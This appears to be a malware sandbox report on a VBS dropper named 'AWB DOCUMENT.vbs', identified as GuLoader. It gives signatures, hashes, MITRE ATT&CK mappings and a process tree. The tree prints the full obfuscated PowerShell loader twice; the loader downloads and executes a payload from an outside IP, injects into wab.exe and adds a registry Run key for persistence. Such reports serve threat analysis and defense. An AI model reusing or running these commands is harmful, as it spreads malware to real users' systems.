Overview

overview

10

Static

static

1

AWB DOCUMENT.rar

windows7-x64

3

AWB DOCUMENT.rar

windows10-2004-x64

3

AWB DOCUMENT.vbs

windows7-x64

10

AWB DOCUMENT.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    19-04-2024 08:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AWB DOCUMENT.vbs

  • Size

    42KB

  • MD5

    a269ee68a794bc1937ee2f122ca339b7

  • SHA1

    7db2bdc98b318bdef18d63862bd09aaa2944353f

  • SHA256

    2d04a69024d34db3522423b703bb949e5f3b4a1d93f6ce4829578cc1111f368d

  • SHA512

    9b1cc1d884dd26543dc816efa176f67260d1a2b9b4b81b3b160ccd247b3803443511176174f65f079f30bf8ea73c2ae03faaade760ecaece3ed1d465ba3bbba1

  • SSDEEP

    768:3a5MtjHffstfbJ9nernOKR/zzk9qgpXKIRdWI5Y19Hny5:3LtLsRbLertkwYnkDnY

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AWB DOCUMENT.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$arbejdslshedskasser = 1;$Untouching='Substrin';$Untouching+='g';Function parasitical($Unleaderly){$Outswindling=$Unleaderly.Length-$arbejdslshedskasser;For($oxydation=6; $oxydation -lt $Outswindling; $oxydation+=(7)){$Nyttedes+=$Unleaderly.$Untouching.Invoke($oxydation, $arbejdslshedskasser);}$Nyttedes;}function Pacifying($Ritraades){& ($Nationalitetsmrke) ($Ritraades);}$Gelototherapy=parasitical ' DataiMNor rioKrigsrzPragmai WronslOutstulknuckla,adici/Adress5Ps,udh.Farve 0 R mpl ,enthe(An xseWDrop,oiAndironModsagdCalor oFigurfwOmf ngs Acale BatikuNOutmouTPligtm Ecosys1Rumper0trumpe.Omstil0 Skrub; Cigar AutostWSnogesiS mplinDrsprk6Uk,ran4 Vokse;Mediu. MongolxTehera6unba.b4Limlim;Kalkul Aaerner Knappviron k: R.rin1 toman2Overch1Pers.n.Man.cu0Faktur)Cyclos ,nintrGDiscomeRubbercOttilik Sid toBirt.b/ Lance2Por,el0Airboa1Casewo0 Trire0,algsd1Satisf0kri,st1Chresa MortifFSna.emiCericsrBrundbeMoti.ef DaryaoJazzbaxFavela/Slknin1Finans2 Unrig1Sta,la.Tagene0Snowbe ';$Vadede=parasitical 'Tu araUp.crolsTegnebe rifinr Undis-TjenstAO,ohelgLemlsteBa.ekanF,skestTegn.n ';$Strepsipteron=parasitical 'Glob.nhAlitr tYapne,tbaronepGbakke:Predyw/bradya/E tera8Apotek7Isopha.Uncurb1 aylor2Musik,1Com.da.Sydfru1An.ihe0Rouvil5Vaaben.Slager1Cavilk8Wirers4overgo/appe.dAIdiophfPrest.mC.astaaNondesg OphugrDiscriiStealtndogmatgCleis ePaeda,rKognin.An.aabxE pones ZoocynSprrer ';$Hoejresiden=parasitical 'Tarred>Bvelse ';$Nationalitetsmrke=parasitical 'Dans hiPolypreIndispxFjernu ';$Deciderende = parasitical 'Overwee Splanc,sittahCoweenoRegneu Manjav%AdressaE konopUnbaptpWaesomdPe,letadatab t OutglaU,func%Ungent\ ftersLNoncenoFeatlerFysiotiK avebcSatcheaAc.idieHvel.e. D,ninUProfetnUncritg Soute Format&dresse&Gumpss Cal.foeM,zambcUd asuhUnelevoPlutar marens$Cerebr ';Pacifying (parasitical 'Fragme$.forklg Larkil Overvo,edtprbOverfra Tomorl Borge:PolyceIevnerin PoochdEgena uOverdisForf itHypothrS aaltiH.bituvHe,eboiAlad arUdmarkkFrem dsFaultsoUlt.almUninjuh TryllePeng,odInfanteAttraprMoler,5Blan e6Ence.h=hidedd(samaric Stvnem Sk,nsdFabrik semico/Ri,knicNothar Mesely$UniverDDeponeeFarvelcGrenadiFaldrad Hassee SymparVir soeSulcalnpaahrbd Vegete,ncrud)saarsk ');Pacifying (parasitical 'Palme,$DiffragBeknotlBratbeoTetraxbPiculeaMer,pelVovede:teamwoDForgroeTillg.uFr dsstFlyseledogmefr.ntermo Ind.agFilbehaVidensmHjemm,y Inco.= Allel$FrothiS NonphtM,terirStolereEmmeripCystocs RavneiE meripudlicitFli deeRe.lerrSpringoTendennSansea.Piaz,is EventpDemonilStenveiG,mbaltColaen(Unglob$InapprHKatalyoMeeklyeFrema,j Misa.r .vogneflirtisBihensiSoldatdCaddowe SteppnCipaye)Tongka ');$Strepsipteron=$Deuterogamy[0];Pacifying (parasitical 'Fr,edo$Diplomg,edetelMetrikoStemmebTyksteaJaponilEncarp: TilstBKogl.reBurp.urAr.oure SittraForbrusironieo CocoanHylden= oliatNNa,nene U lsowGuerez-.orineOSkndigbKadmiujBesl.te Stalkc surpatspkste EmbarSPeasanyEnsretsget pmtTarante egnskmskibsl. ExactNTraitoeSlagortrueful.KildebW,latone piribPilgriCAfpa,rlFemtoniSesc peRedskanImp ovtE.ispl ');Pacifying (parasitical ' Guml $TyfuseBTrihyde Gall.rAutarce B udeaScrymas Per,eoDiametn,olemn.Reakt.HklausueBeskataCorrupdProgree d.gworUdledesSmre,a[,ardig$Sauc,rVKejseraOverladNuttineAffalddBickere Para.]Inhabi=Alkoho$OverliGKalk.le BarselKo.latoSpinwrt Brakpo TeleftUnof.ehRimelieUdnvner,ndustaS.mmenpJournayRecele ');$Muffins=parasitical 'OverliBForhaneScutchrForureeSphyraa TankssQuadreoSandr,n Enc r.Letva,DIsopleoNo ogewSumpfenSuperalTriketopolitia Strepd KraftFAseneriGurtsel BedrueRevela(Skrueb$GeneraSSin rotSmewser P rlaeporrenpStilres Redr.iBlondepMonasttAraneoeOpopanrJugwfroarmqpfnKont r,Hmorro$ rinkUMax.minRoddikiM,rcipkIndgneuGeneromflisereUncoiftAuthen) Equil ';$Muffins=$Industrivirksomheder56[1]+$Muffins;$Unikumet=$Industrivirksomheder56[0];Pacifying (parasitical 'Redisp$ Regimg U ennlLagerboFantasb Ud oraUniforl jlevh:AminoaU MelonnFlugtnm Uv.ldeVrdispd Erhv,a,arachl Bistal.omocyeSkamstd.oprop=T,oldk( BlephTOrnameeHavannsSagaditAlter.- StoryPTron.ka DistitEuryokhBamoth Tid,nn$ FormaUKlynkenOpposiiTestiekSpilpluGennemmBr,ntoe ngivetudeli,) Al.oe ');while (!$Unmedalled) {Pacifying (parasitical ' Beach$Sm.ltegarm,dalhjert,oAn,emabUgestea HadedlStran.:adve.tB CranieMi.ants ,issitDemob,iOversec MornfkPelsdyiSvigtenSi gleg.randd=Underc$Bist,etD.bfror NonpouScrawleFredni ') ;Pacifying $Muffins;Pacifying (parasitical ' OplanSKreatutflourea VurderSldnejtCathja-,ronflSTrav bl Int,reSkrsome Pit,lp Kollo Spyds4Trskel ');Pacifying (parasitical 'System$,rechagBitmoelTusindoPrivatbTelesaashortclHjemme:Besky,UR,ngninkal,famUnmoore KongedTasianaUnbudblAktionl O.tomeProtesdPre,ta=Mist,k(UnparrT.uforieSkramms fo gutIn.isk-Inf.ltP.mningaMar.ystsaalfohSyges Interi$LentitUAmpullnForttniLasknikLiberauKnightmMelanoebln eatE,igre)Ligefo ') ;Pacifying (parasitical 'Xy.ofo$s.rouggAf tvnlLatomioFor enbIndb,uaBrnefdlJeopar:UnlibetSportshBesjlieGrun lrSaltmamTffelhoFarhanlMalediaReferebMatticiH pnotlChoroieYaho.d=Signet$Aspidig Kluddl.vangsoSpawneb eigneaBallooldenat,: Etp.aSSpors tKalkstrIntra.iNullincformstt Levean QuaraeK bayasRyghvisKo,tan+Epider+ D,rke%Crysta$UpsentDDieba.e OccipuHyttertfljm neOps ulrEnkelto Redigg HybosaR dsenm TolkeyFinma..literec Condio TelefuA.tionnTilfretCarann ') ;$Strepsipteron=$Deuterogamy[$thermolabile];}Pacifying (parasitical 'Bourg,$Kaffegg ReasolBridgeoIhrdigbTj nesaStianelSafari: StartTUnwel r LuskeaseparedmeningiPenumbt Or.ngi nnesgoFritidnBrazilaTri acr Minusi PjasklIncitoyBrandm B.icks=Hjorte MarjoGFord.me SpiratInfilt-Obs ruCLagrinocalcarn Kaur tSilvereSpk,innS.udsmtClobbe steri$SemiviU a,ominOrthopi CritikIs quiuDiscanmbeslageAppelltSpor.s ');Pacifying (parasitical ' ydra$Tourisg IndmulShoggioCry,tab Sna.uaHowitzl Udga,: GrusvT elefooOve astRockeryNullin woodb=tes ib P rses[AmygdoS Shoppytude os,ishyst Requee kidefmVoldes.SvendeC Outmao.atinin,kronivUforeneTusserrNummertc,awer] oesi:chlamy:Chir,pFDazzlirExonicoNephelmDeconsB.idundaHandelsRisor eForgri6U parc4SurbatSJulek.tMasquer DemoniIbldstnKntringBnnest(Ti,git$UdbombT UdskirI pulsaBommesdAchorgiChe,sttFormaliFresheoInsuppnU foreaNonexcr.igniniAssignlFrondayTrimet) Taarn ');Pacifying (parasitical ' Aftrd$BegrdegBortfolRossploRotundbHimantaStegemlOps ug:TernasTSidegar.essoueOv rlekma ikelPigeona HypernJ sephgMuseu. Groftm= Cteni an ris[MediciS DisdayHenlags BivaatNummereOpiniom Mnste. orgnyT SilgreVanddaxIso,ogtSal.oe.Napol,E K ffenIpomo,cAff.dioMusculdGafluni DysmonStilisgRippli]Velita:forktr:BesattAImpo.tSAselliCUncateICentriILabber.TermonGKiselsePrveudtVaa enSNo temtSko.thrblemisiDobbelnOrdrebgDough.(Unpunc$ SkelsTDr pstoN,ttletSlagteyHjemme) Blueb ');Pacifying (parasitical 'Beswar$ConkergTubifalSu.ernoEducatbMas efa heraclTromme: Whi eR V,rdeoKonfu.oU.denif Superi indf,nBrittlgfoment=Inter,$BliverT Sque,rSkaktee ManonkRum.ellT ngema Fr,wlnCopiopgUnmist.SuppegslymphauStokrebDepe dsRegisttMavekarTaageti Nonbin FortrgFaksim( Tilba2Subt,r8Byp an0 phl,b0stigni8Etiqu.4Forbru,Re olv2Indust9 Ustra1Prolet7Mu.tis6Parabo)Boulev ');Pacifying $Roofing;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:112
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Loricae.Ung && echo $"
        3⤵
          PID:2444
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$arbejdslshedskasser = 1;$Untouching='Substrin';$Untouching+='g';Function parasitical($Unleaderly){$Outswindling=$Unleaderly.Length-$arbejdslshedskasser;For($oxydation=6; $oxydation -lt $Outswindling; $oxydation+=(7)){$Nyttedes+=$Unleaderly.$Untouching.Invoke($oxydation, $arbejdslshedskasser);}$Nyttedes;}function Pacifying($Ritraades){& ($Nationalitetsmrke) ($Ritraades);}$Gelototherapy=parasitical ' DataiMNor rioKrigsrzPragmai WronslOutstulknuckla,adici/Adress5Ps,udh.Farve 0 R mpl ,enthe(An xseWDrop,oiAndironModsagdCalor oFigurfwOmf ngs Acale BatikuNOutmouTPligtm Ecosys1Rumper0trumpe.Omstil0 Skrub; Cigar AutostWSnogesiS mplinDrsprk6Uk,ran4 Vokse;Mediu. MongolxTehera6unba.b4Limlim;Kalkul Aaerner Knappviron k: R.rin1 toman2Overch1Pers.n.Man.cu0Faktur)Cyclos ,nintrGDiscomeRubbercOttilik Sid toBirt.b/ Lance2Por,el0Airboa1Casewo0 Trire0,algsd1Satisf0kri,st1Chresa MortifFSna.emiCericsrBrundbeMoti.ef DaryaoJazzbaxFavela/Slknin1Finans2 Unrig1Sta,la.Tagene0Snowbe ';$Vadede=parasitical 'Tu araUp.crolsTegnebe rifinr Undis-TjenstAO,ohelgLemlsteBa.ekanF,skestTegn.n ';$Strepsipteron=parasitical 'Glob.nhAlitr tYapne,tbaronepGbakke:Predyw/bradya/E tera8Apotek7Isopha.Uncurb1 aylor2Musik,1Com.da.Sydfru1An.ihe0Rouvil5Vaaben.Slager1Cavilk8Wirers4overgo/appe.dAIdiophfPrest.mC.astaaNondesg OphugrDiscriiStealtndogmatgCleis ePaeda,rKognin.An.aabxE pones ZoocynSprrer ';$Hoejresiden=parasitical 'Tarred>Bvelse ';$Nationalitetsmrke=parasitical 'Dans hiPolypreIndispxFjernu ';$Deciderende = parasitical 'Overwee Splanc,sittahCoweenoRegneu Manjav%AdressaE konopUnbaptpWaesomdPe,letadatab t OutglaU,func%Ungent\ ftersLNoncenoFeatlerFysiotiK avebcSatcheaAc.idieHvel.e. D,ninUProfetnUncritg Soute Format&dresse&Gumpss Cal.foeM,zambcUd asuhUnelevoPlutar marens$Cerebr ';Pacifying (parasitical 'Fragme$.forklg Larkil Overvo,edtprbOverfra Tomorl Borge:PolyceIevnerin PoochdEgena uOverdisForf itHypothrS aaltiH.bituvHe,eboiAlad arUdmarkkFrem dsFaultsoUlt.almUninjuh TryllePeng,odInfanteAttraprMoler,5Blan e6Ence.h=hidedd(samaric Stvnem Sk,nsdFabrik semico/Ri,knicNothar Mesely$UniverDDeponeeFarvelcGrenadiFaldrad Hassee SymparVir soeSulcalnpaahrbd Vegete,ncrud)saarsk ');Pacifying (parasitical 'Palme,$DiffragBeknotlBratbeoTetraxbPiculeaMer,pelVovede:teamwoDForgroeTillg.uFr dsstFlyseledogmefr.ntermo Ind.agFilbehaVidensmHjemm,y Inco.= Allel$FrothiS NonphtM,terirStolereEmmeripCystocs RavneiE meripudlicitFli deeRe.lerrSpringoTendennSansea.Piaz,is EventpDemonilStenveiG,mbaltColaen(Unglob$InapprHKatalyoMeeklyeFrema,j Misa.r .vogneflirtisBihensiSoldatdCaddowe SteppnCipaye)Tongka ');$Strepsipteron=$Deuterogamy[0];Pacifying (parasitical 'Fr,edo$Diplomg,edetelMetrikoStemmebTyksteaJaponilEncarp: TilstBKogl.reBurp.urAr.oure SittraForbrusironieo CocoanHylden= oliatNNa,nene U lsowGuerez-.orineOSkndigbKadmiujBesl.te Stalkc surpatspkste EmbarSPeasanyEnsretsget pmtTarante egnskmskibsl. ExactNTraitoeSlagortrueful.KildebW,latone piribPilgriCAfpa,rlFemtoniSesc peRedskanImp ovtE.ispl ');Pacifying (parasitical ' Guml $TyfuseBTrihyde Gall.rAutarce B udeaScrymas Per,eoDiametn,olemn.Reakt.HklausueBeskataCorrupdProgree d.gworUdledesSmre,a[,ardig$Sauc,rVKejseraOverladNuttineAffalddBickere Para.]Inhabi=Alkoho$OverliGKalk.le BarselKo.latoSpinwrt Brakpo TeleftUnof.ehRimelieUdnvner,ndustaS.mmenpJournayRecele ');$Muffins=parasitical 'OverliBForhaneScutchrForureeSphyraa TankssQuadreoSandr,n Enc r.Letva,DIsopleoNo ogewSumpfenSuperalTriketopolitia Strepd KraftFAseneriGurtsel BedrueRevela(Skrueb$GeneraSSin rotSmewser P rlaeporrenpStilres Redr.iBlondepMonasttAraneoeOpopanrJugwfroarmqpfnKont r,Hmorro$ rinkUMax.minRoddikiM,rcipkIndgneuGeneromflisereUncoiftAuthen) Equil ';$Muffins=$Industrivirksomheder56[1]+$Muffins;$Unikumet=$Industrivirksomheder56[0];Pacifying (parasitical 'Redisp$ Regimg U ennlLagerboFantasb Ud oraUniforl jlevh:AminoaU MelonnFlugtnm Uv.ldeVrdispd Erhv,a,arachl Bistal.omocyeSkamstd.oprop=T,oldk( BlephTOrnameeHavannsSagaditAlter.- StoryPTron.ka DistitEuryokhBamoth Tid,nn$ FormaUKlynkenOpposiiTestiekSpilpluGennemmBr,ntoe ngivetudeli,) Al.oe ');while (!$Unmedalled) {Pacifying (parasitical ' Beach$Sm.ltegarm,dalhjert,oAn,emabUgestea HadedlStran.:adve.tB CranieMi.ants ,issitDemob,iOversec MornfkPelsdyiSvigtenSi gleg.randd=Underc$Bist,etD.bfror NonpouScrawleFredni ') ;Pacifying $Muffins;Pacifying (parasitical ' OplanSKreatutflourea VurderSldnejtCathja-,ronflSTrav bl Int,reSkrsome Pit,lp Kollo Spyds4Trskel ');Pacifying (parasitical 'System$,rechagBitmoelTusindoPrivatbTelesaashortclHjemme:Besky,UR,ngninkal,famUnmoore KongedTasianaUnbudblAktionl O.tomeProtesdPre,ta=Mist,k(UnparrT.uforieSkramms fo gutIn.isk-Inf.ltP.mningaMar.ystsaalfohSyges Interi$LentitUAmpullnForttniLasknikLiberauKnightmMelanoebln eatE,igre)Ligefo ') ;Pacifying (parasitical 'Xy.ofo$s.rouggAf tvnlLatomioFor enbIndb,uaBrnefdlJeopar:UnlibetSportshBesjlieGrun lrSaltmamTffelhoFarhanlMalediaReferebMatticiH pnotlChoroieYaho.d=Signet$Aspidig Kluddl.vangsoSpawneb eigneaBallooldenat,: Etp.aSSpors tKalkstrIntra.iNullincformstt Levean QuaraeK bayasRyghvisKo,tan+Epider+ D,rke%Crysta$UpsentDDieba.e OccipuHyttertfljm neOps ulrEnkelto Redigg HybosaR dsenm TolkeyFinma..literec Condio TelefuA.tionnTilfretCarann ') ;$Strepsipteron=$Deuterogamy[$thermolabile];}Pacifying (parasitical 'Bourg,$Kaffegg ReasolBridgeoIhrdigbTj nesaStianelSafari: StartTUnwel r LuskeaseparedmeningiPenumbt Or.ngi nnesgoFritidnBrazilaTri acr Minusi PjasklIncitoyBrandm B.icks=Hjorte MarjoGFord.me SpiratInfilt-Obs ruCLagrinocalcarn Kaur tSilvereSpk,innS.udsmtClobbe steri$SemiviU a,ominOrthopi CritikIs quiuDiscanmbeslageAppelltSpor.s ');Pacifying (parasitical ' ydra$Tourisg IndmulShoggioCry,tab Sna.uaHowitzl Udga,: GrusvT elefooOve astRockeryNullin woodb=tes ib P rses[AmygdoS Shoppytude os,ishyst Requee kidefmVoldes.SvendeC Outmao.atinin,kronivUforeneTusserrNummertc,awer] oesi:chlamy:Chir,pFDazzlirExonicoNephelmDeconsB.idundaHandelsRisor eForgri6U parc4SurbatSJulek.tMasquer DemoniIbldstnKntringBnnest(Ti,git$UdbombT UdskirI pulsaBommesdAchorgiChe,sttFormaliFresheoInsuppnU foreaNonexcr.igniniAssignlFrondayTrimet) Taarn ');Pacifying (parasitical ' Aftrd$BegrdegBortfolRossploRotundbHimantaStegemlOps ug:TernasTSidegar.essoueOv rlekma ikelPigeona HypernJ sephgMuseu. Groftm= Cteni an ris[MediciS DisdayHenlags BivaatNummereOpiniom Mnste. orgnyT SilgreVanddaxIso,ogtSal.oe.Napol,E K ffenIpomo,cAff.dioMusculdGafluni DysmonStilisgRippli]Velita:forktr:BesattAImpo.tSAselliCUncateICentriILabber.TermonGKiselsePrveudtVaa enSNo temtSko.thrblemisiDobbelnOrdrebgDough.(Unpunc$ SkelsTDr pstoN,ttletSlagteyHjemme) Blueb ');Pacifying (parasitical 'Beswar$ConkergTubifalSu.ernoEducatbMas efa heraclTromme: Whi eR V,rdeoKonfu.oU.denif Superi indf,nBrittlgfoment=Inter,$BliverT Sque,rSkaktee ManonkRum.ellT ngema Fr,wlnCopiopgUnmist.SuppegslymphauStokrebDepe dsRegisttMavekarTaageti Nonbin FortrgFaksim( Tilba2Subt,r8Byp an0 phl,b0stigni8Etiqu.4Forbru,Re olv2Indust9 Ustra1Prolet7Mu.tis6Parabo)Boulev ');Pacifying $Roofing;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Loricae.Ung && echo $"
            4⤵
              PID:2116
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1516
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Transaquatic" /t REG_EXPAND_SZ /d "%Diderich% -w 1 $Secretariat=(Get-ItemProperty -Path 'HKCU:\Pretemptation183\').Mincopie;%Diderich% ($Secretariat)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1552
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Transaquatic" /t REG_EXPAND_SZ /d "%Diderich% -w 1 $Secretariat=(Get-ItemProperty -Path 'HKCU:\Pretemptation183\').Mincopie;%Diderich% ($Secretariat)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1412

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Loricae.Ung
        Filesize

        402KB

        MD5

        65e714e8919573a0872aff681240d69a

        SHA1

        b1d3aa793a22fc278f45d1b36fbae394d62afc44

        SHA256

        3edabb0db7a6250af674d0673b55d455eeebf5b0ae1f4ba24e43803754389137

        SHA512

        49e4dd846fc23d1f4f89ed9cb83abf1480b1a84cd123f294633c2c495ef1db1d200c8258c632494b7003951989059c5826c3e5c1617c8661dfac7831ff4e274f

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VS8J9VBMNKIPL6VNRVRT.temp
        Filesize

        7KB

        MD5

        9e4095d9dc4286fa3dfff521dd26df0f

        SHA1

        e7f773cb1e334c54264f9bac49f959e03c68e4c7

        SHA256

        35ae8c9515b248d6142daa734bdf1bdc27b11f17be27c9d1387a3ee0beb6d463

        SHA512

        5ed15b98048665e09af86183c2966122dceb28570de855ac4b4d320c3525d174aad5218d10cc0341516335d8f016a66f35e1a2269158cf69240d2ddd39eac05e

        Download Submit
      • memory/112-21-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/112-22-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-24-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-9-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-25-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-6-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/112-40-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/112-10-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-7-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/112-5-0x0000000002960000-0x0000000002968000-memory.dmp
        Filesize

        32KB

        Download
      • memory/112-27-0x0000000002860000-0x00000000028E0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/112-4-0x000000001B660000-0x000000001B942000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/1516-34-0x0000000077220000-0x00000000772F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1516-37-0x0000000077220000-0x00000000772F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1516-36-0x0000000001520000-0x0000000005E45000-memory.dmp
        Filesize

        73.1MB

        Download
      • memory/1516-33-0x0000000077256000-0x0000000077257000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1516-32-0x0000000077030000-0x00000000771D9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2452-17-0x0000000073070000-0x000000007361B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2452-28-0x0000000077030000-0x00000000771D9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2452-29-0x0000000073070000-0x000000007361B000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2452-30-0x0000000077220000-0x00000000772F6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2452-31-0x0000000002CE0000-0x0000000002D20000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2452-23-0x0000000006690000-0x000000000AFB5000-memory.dmp
        Filesize

        73.1MB

        Download
      • memory/2452-20-0x0000000002CE0000-0x0000000002D20000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2452-26-0x00000000054E0000-0x00000000054E1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2452-18-0x0000000002CE0000-0x0000000002D20000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2452-16-0x0000000002CE0000-0x0000000002D20000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2452-15-0x0000000073070000-0x000000007361B000-memory.dmp
        Filesize

        5.7MB

        Download